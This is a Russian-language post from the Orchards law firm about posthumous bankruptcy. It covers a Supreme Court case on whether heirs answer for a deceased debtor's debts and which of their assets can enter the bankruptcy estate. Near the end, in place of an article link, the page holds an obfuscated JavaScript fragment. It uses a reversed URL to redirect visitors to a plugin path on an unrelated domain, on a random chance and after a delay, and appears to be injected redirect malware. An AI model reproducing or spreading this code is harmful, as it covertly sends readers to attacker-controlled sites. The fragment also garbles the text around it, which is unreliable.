Банкротство после смерти: что грозит наследникам

Комментарий Вадима Бородкина, советника Orchards, для Право.ru.

Человека порой признают финансово несостоятельным даже после смерти. Тогда в конкурсную массу включают его наследство. Имущество могут забрать у наследника, который пользовался им уже несколько лет, — это нужно, чтобы рассчитаться с кредиторами. А вот личными активами по долгам наследодателя отвечать не придется. Но только если получится отделить их от наследства, отметили юристы. ВС рассмотрел спор между наследниками и ФНС, которая взыскивала налоги за активы умершего, переданные в конкурсную массу.

Согласно ст. 223.1 закона «О банкротстве» («Условия и порядок банкротства гражданина в случае его смерти») человека могут признать банкротом даже после смерти. В таком случае процедура идет по стандартным правилам, отметил Верховный суд в деле № А40-25142/2017. В одно банкротное дело собирают все долги и имущество, вошедшее в наследство должника, включая активы, которые уже получили наследники. 

<…>

Советник Orchards Вадим Бородкин уточняет: личное имущество наследников, которое принадлежало им до банкротства, не попадет в конкурсную массу. Бывают проблемы с разграничением активов — тех, что достались по наследству, и тех, что всегда принадлежали наследнику.

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tory/243421/»>Ссылка на статью>>

Подпишитесь на Telegram Orchards

X